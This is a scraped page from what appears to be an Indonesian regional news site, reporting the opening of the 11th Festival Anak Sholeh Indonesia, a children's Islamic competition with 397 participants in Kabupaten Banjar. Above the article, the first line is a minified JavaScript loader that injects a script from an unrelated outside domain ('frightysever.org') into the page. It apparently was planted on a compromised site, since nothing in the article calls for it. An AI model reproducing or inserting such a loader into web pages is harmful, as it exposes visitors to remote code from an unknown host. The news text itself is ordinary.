(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

397 Anak Ikut FASI XI Kabupaten Banjar


KANALKALIMANTAN.COM, MARTAPURA – Lembaga Pembinaan dan Pengembangan Taman Kanak-kanak Al Qur’an (LPPTKA) Badan Komunikasi Pemuda Remaja Masjid Indonesia (BKPRMI) Kabupaten Banjar menggelar Festival Anak Sholeh Indonesia (FASI) XI tingkat Kabupaten Banjar.

Kegiatan FASI XI Kabupaten Banjar dibuka Ketua Pembina BKPRMI Kabupaten Banjar Hj Raudathul Wardiyah di Gedung Islamic Center Mufti Tuan Guru Besar HM Djazuli Seman pada Minggu (15/3/2020) pagi.

Festival Anak Sholeh Indonesia diikuti TKA, TPA dan TQA Kecamatan se-Kabupaten Banjar dengan 19 bidang diperlombakan.

Hj Raudathul Wardiyah mengatakan, kegiatan FASI merupakan ajang yang tepat untuk memberikan kesempatan bagi anak-anak mengembangkan bakat dan kemampuan yang dimiliki, sekaligus menggali potensi yang ada dalam diri anak agar nantinya terus dikembangkan.

“Sehingga anak-anak nantinya dapat tumbuh menjadi generasi yang sholeh sholehah, cerdas dan berkualitas serta memiliki daya saing tinggi,” ucap Raudathul Wardiyah.

Kegiatan FASI XI tingkat Kabupaten Banjar mengusung tema bisa juara satu, yaitu bina santri jujur arif ramah sabar dan tulus.

FASI digelar sebagai salah satu upaya menyiapkan dan membina untuk membentuk generasi muslim yang jujur, arif, ramah, sabar dan tulus.

“Sejak kecil kita harus membekali anak-anak dengan keimanan, ilmu dan akhlak yang mulia. Karena segala sesuatu yang diajarkan akan lebih mudah melekat dalam ingatan anak-anak,”  ujarnya.

Ia juga menginginkan peran orang tua untuk memberikan pengetahuan agama. Terlebih lagi dalam memberikan bimbingan moral dan akhlak sebagai bekal yang berharga bagi anak-anak.

“Kita para orang tua, para guru dan pembimbing memiliki tanggung jawab supaya anak-anak mendapatkan bekal dalam melangkah menuju masa depan yang lebih baik,” pungkasnya

Sementara itu, Direktur Daerah LPPTKA Kabupaten Banjar H Mahdian Noor mengatakan, diikuti 397 peserta dari 20 kecamatan se-Kabupaten Banjar dan rutin dilaksanakan selama tiga tahun sekali.

“Kegiatan FASI bertujuan meningkatkan wawasan dan memotivasi hasil kegiatan belajar di TK Al Qur’an. Serta akan meningkatkan bibit-bibit untuk ditingkatkan di LPTQ untuk mengikuti lomba ke jenjang lebih tinggi lagi sebagai cikal bakal kegiatan keagamaan di Kabupaten Banjar,” paparnya. (mckominfobanjar/bie/adv)

Reporter : bie
Editor : kk

 


Al Ghifari

Recent Posts

Hari Museum Internasional 2024 “Museum untuk Pendidikan dan Penelitian”

KANALKALIMANTAN.COM - Hari Museum Internasional yang ditetapkan oleh ICOM dan dirayakan setiap tahun pada tanggal… Read More

60 menit ago

Masrumi dari Desa Sungai Namang HSU Raih Prestasi Nasional

KANALKALIMANTAN.COM, SOLO – Masrumi, guru honorer asal Desa Sungai Namang, Kecamatan Danau Panggang, Kabupaten Hulu… Read More

2 jam ago

Pemkab HSU Gelar Upacara HUT ke-75 Proklamasi ALRI Divisi IV Kalimantan

KANALKALIMANTAN.COM, AMUNTAI - Memperingati HUT ke-75 Proklamasi Pemerintahan Gubernur Tentara ALRI Divisi lV Pertahanan Kalimatan,… Read More

2 jam ago

Mantan Karyawan BPR Candi Agung Amuntai Dituntut 7 Tahun

Selewengkan Dana Nasabah, Rugikan Negara Rp779 Juta Read More

2 jam ago

Ungkap Kasus Curanmor di Banjarbaru, 4 Unit Motor Berplat Merah

7 Pelaku Ditangkap dengan Barbuk 21 Unit Sepeda Motor Read More

6 jam ago

Kontestan Kepala Daerah di Kalsel Ditantang Miliki Visi Majukan Perpustakaan

KANALKALIMANTAN.COM, BANJARMASIN - Tim Tenaga Ahli Gubernur Kalimantan Selatan (Kalsel) melakukan kunjungan ke Dinas Perpustakaan… Read More

8 jam ago

This website uses cookies.